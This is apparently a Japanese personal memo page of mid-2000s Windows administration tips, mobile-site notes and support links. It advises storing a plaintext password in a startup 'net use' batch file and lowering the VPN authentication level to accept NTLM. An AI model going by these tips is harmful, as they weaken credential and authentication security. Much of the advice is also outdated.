PreviousTaskFile メンバが Windows Server 2003 または Windows XP に間違っています。
http://support.microsoft.com/kb/898439
Vodafone 3G 端末向けにサイトを作成する上での注意点
Vodafone 3G 端末では、uid/sid/pid などは予約語となっており、予約語のついた URL が書かれているページにアクセスできない。
html ファイル内に <a href="http://hoge.com/?sid=hoge">hoge</a>というリンクがある場合に回覧不可能になります。
http://developers.vodafone.jp/dp/
http://developers.vodafone.jp/dp/tech_svc/info/useragent.php
DoCoMo 以外は Submit ボタンに名前振っても拾えない気がする
よって Submit を複数配置出来なかった気がする。。。
あと、POST 先の URL に パラメータ付けてとかも、そのパラメータを拾えなかった気がする(曖昧なので確認する事)
ケータイWebアプリ開発、9つの注意点
http://www.atmarkit.co.jp/fwcr/special/mobile/01.html
Firefoxでモバイル端末をシミュレートするアドオン「FireMobileSimulator」
http://ke-tai.org/blog/2008/09/04/firemobilesimlator/
モバイル向けサイト制作
http://www.thinkit.co.jp/channel/0810_2.html
第1回:携帯サイトとPCサイトはここまで違う!
http://www.thinkit.co.jp/article/143/1/
第2回:携帯サイトの制作から公開まで
http://www.thinkit.co.jp/article/143/2/
進化するモバイル技術の基礎講座(1)Bluetoothとの連携も――さらなる進化を見せるFeliCa技術
http://monoist.atmarkit.co.jp/feledev/articles/monomobile/01/monomobile01_a.html
モバイル通販「1回1万円以上使ってもいい」、利用者の半数が許容
http://www.nikkeibp.co.jp/article/news/20090928/184185/
無料モバイルサイト解析ツール|myRTモバイル
http://myrt.auriq.com/mobile/jp/
GoogleのWeb解析サービスに携帯サイト対応など新機能追加
http://www.itmedia.co.jp/enterprise/articles/0910/21/news081.html
メールマーケティングのやり直し
http://japan.internet.com/column/wmnews/20091028/7.html
知らないと損をする!感動の“超高速”検索術:1秒で見つけるGoogle検索
http://pc.nikkeibp.co.jp/article/knowhow/20100127/1022492/?P=1
google の検索条件時の制限解除(英語版サイトのみで有効)
http://www.google.com/intl/en/
「Preferences」をクリック。
「Interface Language」を、「Japanese」に
「SafeSearch Filtering」の「Do not filter my search results.」をチェック(ここが制限解除の設定)
「Save Preferences」を押して設定完了。
※最近、英語版の google から来る人が増えたのは、これの影響かな?
そのた。
ちょっと自慢できるこんな裏技 Googleを「仕事」で使い倒せ!(特集)
中国版Yahoo!でチョメチョメを検索すると・・・
http://sawasho.com/blog/archives/2005/05/yahoo.html
http://hobby7.2ch.net/test/read.cgi/occult/1113915124/313
グーグル社、中国政府の検閲に同意
http://hotwired.goo.ne.jp/news/culture/story/20060126207.html
そういえば、google はクッキーに固有のシリアルを埋め込んで、JavaScript 使って何かやってます・・・
ヘッダ情報をチェックすると判ります。
Googleがユーザーをウイルス扱い? Kaspersky Labが問題提起
http://www.itmedia.co.jp/news/articles/0706/16/news011.html
問題のメッセージ
http://www.google.com/sorry/misc/?continue
最近はじめた Google Trends が楽しいですね。
DB対決
SQL Server,oracle,mysql,PostgreSQL,XMLDB
http://www.google.com/trends?q=SQL+Server%2Coracle%2Cmysql%2CPostgreSQL%2CXMLDB&ctab=0&geo=all&date=all
oracle 強いなぁ・・・
Outlook Express で折り返し設定を有効にする
RFC2646 の Wrapping 機能を無効化
HKEY_CURRENT_USER\Software\Microsoft\Outlook Express
値の名前 : Disable RFC2646 Wrapping
データ型 : REG_DWORD
値 : 1
RFC2646 では、半角スペースなしに連続で入力された文字列をひと続きの文字列として認識し
改行などを行わないことを推奨しています。
日本語の文章は、多くの場合、ダブルバイトの文字のみが連続し、半角スペースが含まれないため
改行が行われないという問題が発生します。
Windows XP Service Pack 2 適用後、Outlook Express で折り返し設定が有効にならない
ASCII記号のURLエンコード対応表
CHAR CODE HTML4.0 #番号
SPACE %20  
! %21
" %22 " "
# %23
$ %24
% %25
& %26 & &
' %27
( %28
) %29
* %2A
+ %2B
, %2C
/ %2F
: %3A
; %3B
< %3C < <
= %3D
> %3E > >
? %3F
@ %40
[ %5B
\ %5C
] %5D
^ %5E
` %60
{ %7B
| %7C
} %7D
~ %7E
USB 外付けストレージへの書き込み禁止
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\StorageDevicePolicies
値の名前 : WriteProtect
データ型 : REG_DWORD
値 : 1
参考
USBメモリーへの書き込みを禁止する
http://arena.nikkeibp.co.jp/tec/winxp/20050304/111655/
ネットワークドライブにアクセスした時に、パスワードを聞かれないようにする
net use コマンドをバッチを使ってスタートアップに入れておくと出来ます。
リソース(サーバ)の名前が HOME でフォルダが HOGE の場合
C:\>net use x: \\home\hoge /user:domain\user password
仮想の x ドライブに \\home\hoge フォルダを割り当てた状態になります。
Microsoft PowerToys for Windows XP の TweakUI.exe を利用しても出来るかも?(試してませんし調べてません)
ひょっとして、マイネットワークを右クリックして「ネットワークドライブの割り当て」から出来るのでは…
「異なるユーザ名で接続する」ってあるし。
ネットワーク リソースへのアクセスを改善
KEY: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MrxSmb\Parameters
値の名前 : InfoCacheLevel
データ型 : REG_DWORD
値 : 0x10(16進)
0 = すべてのファイルとフォルダのキャッシュを無効にします。
1 = 短いファイル名 (8.3 形式) のキャッシュを有効にします。デフォルトの値です。
10 = すべてのファイルのキャッシュを有効にします。
ネットワーク ベースのファイルで、8.3 形式の短いファイル名構文ではなく
長いファイル名構文が使用されている場合にサーバー メッセージ ブロック (SMB)
リダイレクタ コンポーネントは、長いファイル名のパス情報をキャッシュしません。
情報がキャッシュされないと、Windows XP では GetFileAttributes 関数呼び出しのたびに
2 個の SMB パケットが送信されます。
参考
Windows XP でのネットワーク リソースへのアクセスが、以前のバージョンの Windows に比べて遅い
セキュリティ更新プログラム 885250 (MS05-011) のインストール後、Windows XP または Windows Server 2003 でネットワーク共有のサブフォルダの内容が表示されないことがある
Windows Server 2003 SP1 で仮想 CD が使いたい場合
vcdrom.sys を使うとマウント出来るようになります。
使い方は @IT に書かれていますのでそこを参考に。
仮想CD-ROMイメージをマウントする(vcdrom.sys編)
DAEMON TOOLS も問題なくなりました。が、アドウェアがセットでついてくるので注意。
DAEMON TOOLS
http://www.daemon-tools.cc/dtcc/announcements.php
「Daemon Tools」最新版v4.00にアドウェアが同梱
http://www.forest.impress.co.jp/article/2005/11/15/daemon40adware.html
ストリーミング配信
通信と放送の融合:家庭内で先行か 野村総研
http://www.mainichi-msn.co.jp/it/solution/news/20050603org00m300105000c.html
を読んだ。
IIS5.0 の時は試した事があったけど(マシンパワー不足でフリーズしたけど・・・)
2003 でも試してみるか。。。
PC からコントロール出来るリモコンと、キャプチャカード(デジタル放送対応してるのってあるのかな?)
で、IIS(ローカルネットワークのみアクセス可能)にしたら
ブラウザで TV 視聴可能になるわけだし。。。
って、昔考えて NTTのフレッツロボは買ってはみたけど、、、埃まみれ。
これだけだと、意味ないので
ストリーミング用プロトコル
rtsp://
mms://
利用するポートは、、、忘れた。
RTSP protocol
554/tcp
6970-6999/udp
最近は音楽配信が流行ってサイトが乱立しているみたいだけど
録音したデータを会社でこっそり聞くため(笑)2000年頃から
自分用にサイトを作ってたりする。。。
って書くと、変なアクセス増えるかなぁ…
げ、サーチエンジンで URL 漏れてるじゃん。URL 変えておこう、、、汗
それにしても何で出てくるんだ?気持ち悪いなぁ・・・
構築の仕方は暇なときに、コンテンツに追加・・・できるといいなぁ、、、
Windows Media 9 シリーズ - ファイアウォール情報
http://www.microsoft.com/japan/windows/windowsmedia/serve/firewall.aspx
クライアントが Windows Media Player を使用して Windows ファイアウォール経由でマルチキャスト ストリームやその他の UDP ストリームに接続できないことがある
http://support.microsoft.com/kb/883831
Windows XP SP2 で Windows ファイアウォール サービスは開始できません。
http://support.microsoft.com/kb/920074
[WMP]Secure Sockets Layer ストリームを再生できない
http://support.microsoft.com/kb/285028
IE 上に貼り付けた アクティブコンポーネントなら動きます。
が、WMP11βは30分以上のストリーミング再生が出来ないような…
キャプチャ パフォーマンスの向上
http://www.microsoft.com/JAPAN/developer/library/jpdx8_c/ds/Oview/Improving_Capture_Performance.htm
ストリームの圧縮・解凍方法 - VB マイグレーション Tips
http://www.microsoft.com/japan/msdn/vbasic/migration/tips/GZipStream/
デジタルを楽しむ
第1回 メディア・サーバーでデジタル・コンテンツを楽しむ
http://itpro.nikkeibp.co.jp/article/COLUMN/20060224/230623/
DLNA が本格普及してくると、不要になるかな。。。
Windows Media Playerの修正パッチに問題,再生が中断される場合あり
http://itpro.nikkeibp.co.jp/article/NEWS/20060309/232187/
イニシア、自宅PCから動画のライブ配信ができる「Clipstream Live」を発売
http://japan.cnet.com/news/media/story/0,2000056023,20109687,00.htm
映像コンテンツのメタデータ管理ソフト、事業者向けにFMMCが無償配布
http://internet.watch.impress.co.jp/cda/news/2006/06/23/12440.html
「コピーし放題」でも儲かる!? DRMフリー音楽の今
http://www.ascii.jp/elem/000/000/071/71759/
MicrosoftがMP3でDRMフリー音楽配信へ,携帯用プレーヤ「Zune」も全面刷新
http://itpro.nikkeibp.co.jp/article/NEWS/20071004/283810/
【連載企画】
合法的音楽配信サイトを作ってみる(1)
http://blogs.itmedia.co.jp/kurikiyo/2007/09/jasrac_c023.html
合法的音楽配信サイトを作ってみる(2)
http://blogs.itmedia.co.jp/kurikiyo/2007/09/post_45ce.html
合法的音楽配信サイトを作ってみる(3)
http://blogs.itmedia.co.jp/kurikiyo/2007/09/post_01ec.html
へぇ。。。
ストリーム配信のみで月額1000円なら、配信出来ない事は無いな…
あわせてこのあたりも。
コピーライト資料館
http://www.kidscric.com/siryo/siryo.html
著作権学習コンテンツ
http://deneb.nime.ac.jp/contents/index.htm
米Yahoo!、楽曲のフルトラック再生が可能な無料サービスの提供を開始
http://journal.mycom.co.jp/news/2008/09/19/033/
そのうち専用ガジェットプレーヤー出そうですね。
第374回:DLNA 1.5で可能になった「3BOX」環境を試す
http://internet.watch.impress.co.jp/docs/column/shimizu/20100112_341012.html
ルータ
SIP対応ルータに変えてから、ドメインコントローラの調子がすこぶる悪いきがする(落ちる)
単純に電源不良なだけかなぁ。。。
で、電源を250Wから 485Wに付け替えてみましたが改善されず、、、
悪化して起動もしない(ファンが動いたり止まったりを繰り返す)状況に陥ったので、諦めて DELL のサポートで連絡。
対応事態は翌日していただけましたが、マザー、CPU、メモリと交換しても変わらず・・・(呪われてる?)
結局、原因は Power スイッチだったんですけどね。。。
どうやら勝手に ON、OFF を繰り返していたらしい。
OS(Windows)が安定しないなぁ・・・と思いきや、盲点でした。
今おぼえば、SC600(DELL)買った当時から月1回は勝手に落ちてたような、、、
初期不良だったのでしょうが、よく2年も動いてたものだ(そもそも気づかないよ、これが原因だと)
初期不良といえば、会社の DELL の PC もそうで、同時期に買ったPC全てが不良品。
リコールは出てないようですが、OptiPlex GX270 を使っている人は、一度マザーを確認した方が良いかも。
コンデンサが膨張してたらサポートに連絡してマザーの交換をしてもらいましょう。。
(コンデンサの頭が平らでなく盛り上がってたら不良品です)
このマザーに付いてるコンデンサの頭が (×)タイプは古いもので、(K)タイプは対策品らしい。(交換されたものはそうなってました)
また、内臓の時計が狂う(主電源のコンセント抜いて5分後くらいに起動してみる)場合もマザーボードの交換対象になるようです。(電池だけの交換は無いらしい)
と、いう事で暫くアクセスが出来なかったのは、ハードの故障でハッカーにやられたわけではありません。
BPS(バトルプログラマーシラセ) に出てきた事をやられたのかと一瞬思いましたが(笑
関連
デル1社では済まない--PCメーカーを揺るがす不良コンデンサ
「CG-FSW8AW/8AB」の不具合についてのお詫びと無償交換のご案内(コレガ)
2008.9.1
DELL の PC が不具合で火災 だそうで、2003年5月〜2004年11月に国内で出荷された
Dimension 2400c, 4600c で電源装置の故障が原因だそうです。問合せ先は (0120)198499
デル製パソコン2機種14万台に不具合、通電不良や発煙の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20081001/315862/
ひょっとして、SC600 を買った時とかぶってる?
自宅に置くにはファーンの音が問題で知り合いに上げちゃいましたけど。
まだ SC1420 の爆音にも悩まされているたりしますので、次はこれを何とかしたいですねぇ。
P3P の作成方法
確認中・・・
【絵で分かるキーワード】P3P(The Platform for Privacy Preferences(ASCII)
http://review.ascii24.com/db/review/soft/web/2003/06/01/643973-000.html
Web サイトに P3P プライバシー ポリシーを導入する方法(Microsoft)
http://www.microsoft.com/japan/msdn/workshop/security/privacy/overview/createprivacypolicy.asp
Platform for Privacy Preferences 1.0 (P3P1.0) 仕様書 (W3C勧告 2002年4月16日)
http://www.iajapan.org/trans2japanese/w3c/rec-p3p-20020416j.html
とりあえず、 CP 書いとけば OK のようで。
MS サイト(www.microsoft.com)の HEAD 情報
-------------------------------------------
Date: Mon, 27 Jun 2005 06:38:55 GMT
Content-Length: 21459
Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/6.0
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Via: 1.1 cache3 (NetCache NetApp/5.3.1R1)
-------------------------------------------
参考
検証 IE 6のプライバシ管理機能
2.より高機能なプライバシ管理を可能にするP3P
http://www.atmarkit.co.jp/fwin2k/experiments/ie6privacy/ie6privacy_03.html
ポリシー作成は 個人情報保護とプライバシー情報管理システム の http://fs.pics.enc.or.jp/p3pwiz/p3p_ja.html から簡単に作成できるようです。
P3Pコンパクトポリシーをコピペするのが流行らないことを祈る
http://bakera.jp/ebi/topic/3594
Windows 98 と 2000 のサポート期間
> Windows 2000が7月1日から延長フェーズへ突入,ユーザーは注意
> http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050627/4/
メインストリームのサポートは製品発売から5年間または次期バージョン発売後2年間
よって
Windows 2000 Professional の後継である Windows XP が 2001年10月
Windows 2000 Server の後継である Windows 2003 Server が 2003年6月
メインストリームが 2005年6月30日で終了になる訳ですが
延長サポートが、5年間または次々期バージョン発売後2年間のいずれか長いほうとなる。(最短で10年間提供される)
問題となってくるのが、メインストリームでサポートされてた事がどう変わるか。って事になってきますが
メインストリームサポートで提供されていたのが
「有償サポート」
「セキュリティ更新プログラムの提供」
「セキュリティ関連以外の修正プログラムの提供」
「無償インシデントサポート」
「デザイン変更及び機能追加」
「サポート技術情報の提供」
「マイクロソフトヘルプとサポートサイト」
で、
メインストリーム終了後に打ち切られるのが
「セキュリティ関連以外の修正プログラムの提供」※メインストリームサポート終了後、90日以内に延長修正プログラムの契約により有償で提供。(たぶん高い)
「無償インシデントサポート」
「デザイン変更及び機能追加」
の3つ。
ここで注意しなければならないのが
Windows Update を通じてセキュリティ更新プログラムを入手出来るのが「原則として延長サポートの最初の2年間」だけって事です。
その後どうなるか、と言うと「ダウンロードセンターで提供されるので自分で取りに行くしかない」って事になっているようです。
URL は http://www.microsoft.com/downloads/
Windows 2000 SP2 以前は、既に延長サポート終了で、Windows 2000 SP3 が2005年 6月30日で終了します。
IE も Windows 2000 SP4 で動作する 6.0 SP1 のみ延長サポートの対象
Windows 98、Windows 98 SecondEdition、Windows MilenniumEdition たちはどうか、というと
OS や OS 上で使用する IE 6.0 SP1 は 2006年 6月30日で打ち切りです。> 残り1年
Windows 2000 SP4 用の更新プログラム ロールアップ 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=c0a2ca36-1179-431c-80e6-60a494d3823d
Windows 2000用のUpdate Rollup 1、適用後の不具合を修正した新バージョン
http://internet.watch.impress.co.jp/cda/news/2005/09/14/9132.html
ダウンロード
http://www.microsoft.com/downloads/details.aspx?amp;displaylang=ja&familyid=B54730CF-8850-4531-B52B-BF28B324C662&displaylang=ja
XP HOME
【Windowsコラム】【特集】どうする「寿命切れ迫るWindows XP」
(第1回)XPユーザーは「サポート終了」と「SP 3の出荷延期」に注意
http://itpro.nikkeibp.co.jp/article/Windows/20060207/228689/
(第2回)「XP Homeに関するポリシーを変更する予定はない」---MS
http://itpro.nikkeibp.co.jp/article/Windows/20060207/228690/
(第3回)メーカーで異なるセキュリティ・パッチの適用状況
http://itpro.nikkeibp.co.jp/article/Windows/20060208/228790/
Windows XP Homeはあと3年でパッチがリリースされなくなる
http://slashdot.jp/article.pl?sid=06/02/08/1258212
Windows Vistaを待つべきか、そろそろ考えてみませんか?
http://arena.nikkeibp.co.jp/col/20060207/115286/
Windows デスクトップ製品のライフサイクル
http://www.microsoft.com/japan/windows/lifecycle/default.asp
サービスパックロードマップ
http://www.microsoft.com/japan/windows/lifecycle/servicepacks.asp
Microsoft Operations Manager 2005
http://www.microsoft.com/japan/mom/default.mspx
携帯電話から簡単にサーバにアクセス出来る携帯管理コンソール(Mobile Phone Console) があるようです。
携帯電話からサーバのリモート管理を実現する「日本独自」の製品だそうで「いつでも」「どこからでも」稼動状況が把握できる!
って事みたいです。障害が発生した際にはメールで通知って機能もあるらしい。
MSDN
http://go.microsoft.com/?linkid=3433135
OS の勉強したいなら、Windows オペレーティング システム を手に入れましょう。
Windows Review Windows 2003 SP1開発者インタビュー(前編)
http://itpro.nikkeibp.co.jp/free/NT/WinInterview/20050624/1/
単独で購入するより、多分安く済みます。
MSDN オンライン公開の最新技術情報から自分の関心のある記事を絞り込めます。
http://go.microsoft.com/?linkid=3433134
MSDN Connection は、お客様から登録いただいた興味分野に該当する技術資料を
一覧としてまとめてお届けします。お客様が必要な情報を 1 ページに集約できます。
これは便利かも。
マイクロソフト製品を購入前にテストする「最安」の方法:ITPro
http://itpro.nikkeibp.co.jp/article/COLUMN/20070926/283045/?ST=win
あとは、実機が無くてもテストできるバーチャルラボとか。
TechNet Virtual Labs
http://www.microsoft.com/japan/technet/traincert/virtuallab/default.mspx
『TechNet』の歩き方
http://journal.mycom.co.jp/series/technet/menu.html
Mark of the Web
http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/overview/motw.asp
<!-- saved from url=(0014)about:internet -->
↑は、文字数。
ってソースに書いとく。
url=(13)about:internet はミスですよねぇ…
"Windows XP Service Pack 2 セキュリティ強化機能搭載" での機能の変更点
第 5 部 : ブラウズのセキュリティ強化
http://www.microsoft.com/japan/technet/prodtechnol/winxppro/maintain/sp2brows.mspx#E42AG
↑ url=(13)about:internet って書かれている。
スクリプトは、 Windows XP Service Pack 2 または Windows XP Tablet PC Edition 2005 で .htc または .xml ファイルを参照するローカル HTML Web ページで実行されない可能性があります。
http://support.microsoft.com/kb/884322/ja
↑ url=(13)about:internet って書かれている。
データ アクセス ページの表示は、 Windows XP Service Pack 2 を実行しているコンピュータでブラウザでプレビュー モードでブロックされます。
http://support.microsoft.com/kb/883866/ja
↑ url=(14)about:internet って書かれている。
VPN
Windows Server 2003 を使用した仮想プライベート ネットワーキング: リモート アクセス VPN の展開
http://www.microsoft.com/japan/technet/prodtechnol/windowsserver2003/technologies/networking/vpndeplr.mspx
プライベート ネットワークや Windows Server 2003 のインターネットを経由する Point-to-Point 通信をセキュリティで保護する方法
http://support.microsoft.com/kb/324747/ja
PPTP トラフィックの分析
http://www.microsoft.com/japan/technet/community/columns/cableguy/cg0103.mspx
VPN サーバーとファイアウォールの構成
http://www.microsoft.com/resources/documentation/WindowsServ/2003/standard/proddocs/ja-jp/Default.asp?url=/resources/documentation/WindowsServ/2003/standard/proddocs/ja-jp/sag_VPN_und13.asp
VPN(Virtual Private Network)構築編
http://www.e-ryoichi.net/vpn/vpn_built_packet_fitering.html
インターネットVPN環境を構築する
http://www.atmarkit.co.jp/fwin2k/verification/vpn01/vpn01_04.html
SoftEther VPN 2.0 の Web サイト
http://www.softether.com/jp/vpn2/
PPTP のパケットフィルタ
TCP/1723
GRE/47
確認コマンド portqry.exe -n [SERVER IP] -e 1723
TCP port 1723 (pptp service): LISTENING
と表示されればOK
L2TP/IPSec のパケットフィルタ
確認コマンド portqry.exe -n [SERVER IP] -e 1701 -p UDP
UDP/500
UDP/1701
UDP/4500
ESP/50
SSTP のパケットフィルタ
(確認してません。 たぶん TCP/443)
Windows Server 2003 で IPSec トンネリングを構成する方法
[HOWTO] Windows Server 2003 でレイヤ 2 トンネリング プロトコルで使用する事前共有キーを構成する方法
ソフトイーサ、 VPNシステムのホームユース版 『PacketiX VPN 2.0 HOME Edition for Windows』 を発売
http://www.ascii24.com/news/i/soft/article/2006/02/21/660697-000.html
第3回 PPTPサーバの導入 1.Active Directoryの導入手順について
http://www.atmarkit.co.jp/fwin2k/verification/vpn03/vpn03_01.html
Windows Server2003でリモートユーザーがネットワークにアクセスできるようにする方法
http://www.windows-world.jp/ms_support/-/30222-1.html
ステップバイステップ ガイド : サイト間の仮想プライベート ネットワーク接続の構築
http://www.microsoft.com/japan/technet/windowsserver/2003/technologies/directory/activedirectory/stepbystep/vpnconn.mspx
Windows Server 2003 の RRAS で インターネットVPN を組む場合は、ローカルセキュリティポリシーの設定に注意。
VPN サーバで
LAN Manager 認証レベル:NTLMv2 応答のみ送信(LM と NTLM を拒否する)
にすると認証が通りません。
LAN Manager 認証レベル:NTLMv2 応答のみ送信(LM を拒否する)
だと通ります。
ドメインで認証する場合はドメインコントローラセキュリティポリシーも同様に変更する必要があります。
繋がらなくて悩んだ…
ユーザ、パスワードが正常に送信されてなさげなのでバグっぽい…
ドメイン組んでいる場合は、setspn で URL のマッピングをする必要があるのかも。(試してないけど…)
なんか、VISTA の動きが変だ…(2007.11.28時点)
証明書を使った接続を行った場合や、ドメインサーバへワークグループの端末から接続した場合に
認証が通らないような、、、ユーザ名に Domain\User か User@Domain でドメインに何も入れなければ
接続出来たけど…
PPTP Ping 接続テスト用ツール
・pptpclnt.exe(クライアント側で実行)
・pptpsrv.exe (サーバ側で実行)
※ Windows Server 2003 には付属しない。また動作させるには、TCP/1723、GRE を開いておく必要がある。
Windows XP または Windows Server 2003 を実行している VPN クライアント コンピュータは、リモート ネットワークのリソースにアクセスすることができません。
Windows XP ベースのコンピュータから仮想プライベート ネットワーク(VPN)接続を介してルーティング と リモート アクセス サービス サーバーに接続するのにコンピュータが 32 以上の静的なルートは確立できません。
PAP、CHAP または認証を使用して Windows Vista または Windows Server 2008 を実行しているコンピューターへの VPN 接続を作成することはできません。
Windows Vista や XP SP2 で NAT-T をサポートしていますが、デフォルトのままでは使用されないようです。
KEY: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IPSec (XP)
KEY: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PolicyAgent (Vista)
値の名前 : AssumeUDPEncapsulationContextOnSendRule
データ型 : REG_DWORD
値 : 1 又は 2
0: NAT-T 無効
1: 一方が NAT の背後
2: 両方が NAT の背後
※このキーを追加後は再起動が必要。また、サーバ側にも設定が必要。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters (2003 Server)
値の名前 : NegotiateDH2048
データ型 : REG_DWORD
値 : 1
Windows XP および Windows 2000 用 L2TP/IPSec NAT-T 更新プログラム
http://support.microsoft.com/kb/818043
IPsec NAT 移動(NAT-T)の既定の動作は、 Windows XP Service Pack 2 で変更されます。
http://support.microsoft.com/kb/885407/ja
NAT デバイスの背後にある、Windows Vista のベースまたは Windows_Server_2008-ベースのコンピュータは、IPsec トンネル モードの接続を介して別のコンピュータと通信できません。
http://support.microsoft.com/kb/957624
そのうちチェック
Windows XP および Windows Server 2003 でレジストリをバックアップ、編集および復元する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;322756
291988 - 4 GB RAM チューニング機能と物理アドレス拡張スイッチの説明
http://go.microsoft.com/?linkid=2480120
[FIX] IIS 6.0 でパスワード変更ページを使用するときにさまざまな問題が発生する
http://support.microsoft.com/default.aspx?scid=kb;ja;833734
できます! Windows ネットワーク上での Mac のセキュリティ保護
http://go.microsoft.com/?linkid=3376700
Windows は CD-ROM 上のファイルの時刻をローカル タイム ゾーンに調整
http://support.microsoft.com/default.aspx?scid=kb;ja;242059
Windows Server 2003 証明機関と Entrust CA で相互認証を行う方法
http://support.microsoft.com/default.aspx?scid=kb;ja;290760
[FIX] 32 ビット版の SQL Server 2000 SP4 を実行するコンピュータで、AWE を有効にすると使用できないメモリ領域がある
http://support.microsoft.com/default.aspx?scid=kb;ja;899761
セキュリティ更新プログラム 896428 により、Windows Server 2003 および Windows XP で Telnet クライアントが追加の環境変数を公開できる新しいレジストリ キーが追加される
http://support.microsoft.com/default.aspx?scid=kb;ja;900934
[RDS]Windows 2000 での RDS の構成について
http://support.microsoft.com/default.aspx?scid=kb;ja;250536
[netshow]Windows Media Format 7 SDK Readme
http://support.microsoft.com/default.aspx?scid=kb;ja;417666
Windows XP の起動時にシリアル マウスの検出を抑止する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;889045
Windows XP で MFC アプリケーションを実行すると GDI オブジェクトでメモリ リークが発生する
http://support.microsoft.com/default.aspx?scid=kb;ja;319740
Windows 2000、Windows XP および Windows Server 2003 のメモリ ダンプ ファイル オプションの概要
http://support.microsoft.com/default.aspx?scid=kb;ja;254649
Windows Media サービス 9 シリーズの動的再生リスト生成時におけるユーザーコンテキスト変数の取り扱いについての説明
http://support.microsoft.com/default.aspx?scid=kb;ja;899647
Windows Media Player 9 でストリーミング コンテンツの再生が途中で停止するときの対処方法
http://support.microsoft.com/default.aspx?scid=kb;ja;899635
Windows Server 2003 でフォルダ リダイレクトを使用して Application Data をリダイレクトすると正しく表示されないことがある
http://support.microsoft.com/default.aspx?scid=kb;ja;884357
クラスタ化されていない Windows 2000 Server に MSDTC を再インストールする方法
http://support.microsoft.com/default.aspx?scid=kb;ja;279786
サイト URL フォルダ名 ファイル名に使用できない文字
http://go.microsoft.com/?linkid=3492104
Windows Shell 内の未チェックのバッファが原因でコードが実行される
http://go.microsoft.com/?linkid=3492102
Windows XP で MFC アプリケーションを実行すると GDI オブジェクトでメモリ リークが発生する
http://go.microsoft.com/?linkid=3492103
Windows 2000 Service Pack Update.exe のコマンドライン スイッチ
http://support.microsoft.com/default.aspx?scid=kb;ja;262839
Windows XP Service Pack 2 でリモート デバッグを有効にする方法
http://support.microsoft.com/default.aspx?scid=kb;ja;833977
Windows 2000 SP4 対応の更新プログラム ロールアップ 1 (KB891861) の適用後に Excel や Word でフロッピーディスクにアクセスすると応答を停止する場合がある
http://support.microsoft.com/default.aspx?scid=kb;ja;904130
Windows の DCOM サポートを無効にする方法
http://support.microsoft.com/default.aspx?scid=kb;ja;825750
[HOWTO] Windows Server 2003 でサービスのスタートアップ アクセス許可のトラブルシューティングを行う方法
http://support.microsoft.com/default.aspx?scid=kb;ja;327545
[HOWTO] Windows Server 2003 でイントラネットのユーザーとグループのアクセス許可を構成する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;326214
892340 - Microsoft Windows AntiSpyware (Beta) によってプログラムがスパイウェアと判定される
http://go.microsoft.com/?linkid=3707725
Windows Server 2003 ターミナル サーバーのライセンスの問題と展開のための要件
http://support.microsoft.com/default.aspx?scid=kb;ja;823313
[HOWTO] .NET アプリケーション用に SQL Server のセキュリティを構成する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;815154
Windowsでイントラ・ブログを構築する(前編)
http://www.atmarkit.co.jp/fwin2k/operation/intrablog01/intrablog01_01.html
Apache 2.0の必須設定と基本セキュリティ対策
http://www.atmarkit.co.jp/flinux/rensai/apache2_01/apache01a.html
第5回 ASP.NETアプリケーション、DotNetNukeをインストールする
http://www.atmarkit.co.jp/fwin2k/verification/web200805/web200805_01.html
W3C,公開鍵管理仕様「XKMS 2.0」を勧告として公開
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20050629/163538/
Google Maps の API
http://maps.google.com/
http://www.google.com/apis/maps/signup.html
Google Maps API Documentation
http://www.google.com/apis/maps/documentation/
一部のマニアの間で人気らしい。
東芝の「RD-H1」
http://www3.toshiba.co.jp/hdd-dvd/products/hddrec/
「VirtualRD for Windows」(および「番組ナビゲータ」)
http://www.roy.hi-ho.ne.jp/masao/rd/
Dictionary オブジェクト
http://www.microsoft.com/japan/msdn/library/ja/script56/html/jsobjDictionary.asp
# ちょっと使う機会があったので。
USBハードディスクにもう1つのWindows環境を構築できる「BOOT革命/USB」
http://nikkeibp.jp/wcs/j/comp/387579
IIS 6.0のFTPサーバでユーザー・フォルダを分離する(Active Directory編)
http://www.atmarkit.co.jp/fwin2k/win2ktips/588ftpad/ftpad.html
IIS 6.0のFTPサーバでユーザー・フォルダを分離する(基本編)
http://www.atmarkit.co.jp/fwin2k/win2ktips/586ftpisolate/ftpisolate.html
tftpサービスを起動する
http://www.atmarkit.co.jp/fwin2k/win2ktips/561tftpd/561tftpd.html
IIS 6.0のWeb拡張機能を有効にする
http://www.atmarkit.co.jp/fwin2k/win2ktips/546iis6func/iis6func.html
IISのログ・ファイルを午前0時に切り替える
http://www.atmarkit.co.jp/fwin2k/win2ktips/486iislog/iislog.html
IISの標準FTPバナー・メッセージを表示させない
http://www.atmarkit.co.jp/fwin2k/win2ktips/602ftpbanner/ftpbanner.html
タスク・スケジューラをコマンド・プロンプトから制御する
http://www.atmarkit.co.jp/fwin2k/win2ktips/582schtasks/schtasks.html
ファイル名の表示順序を変更する
http://www.atmarkit.co.jp/fwin2k/win2ktips/342xpsort/xpsort.html
905226: Windows XP または Windows 2000 Professional の確認時にWindows Genuine Advantage (正規 Windows 推奨プログラム) の確認処理が完了しない (Microsoft)
http://support.microsoft.com/default.aspx?scid=kb;ja;905226
W32Time により頻繁にイベント ID 50 がイベント ログに記録されWindows Server 2003 および Windows XP で時刻の同期に失敗する
http://support.microsoft.com/default.aspx?scid=kb;ja;830092
Windows 2000 または Windows Server 2003 で、ターミナル サービスセッションからのログオフに予想以上の時間がかかる
http://support.microsoft.com/default.aspx?scid=kb;ja;828326
Windows XP および Windows Server 2003 における 32 ビット版と 64 ビット版のメモリ構造の比較
http://support.microsoft.com/default.aspx?scid=kb;ja;294418
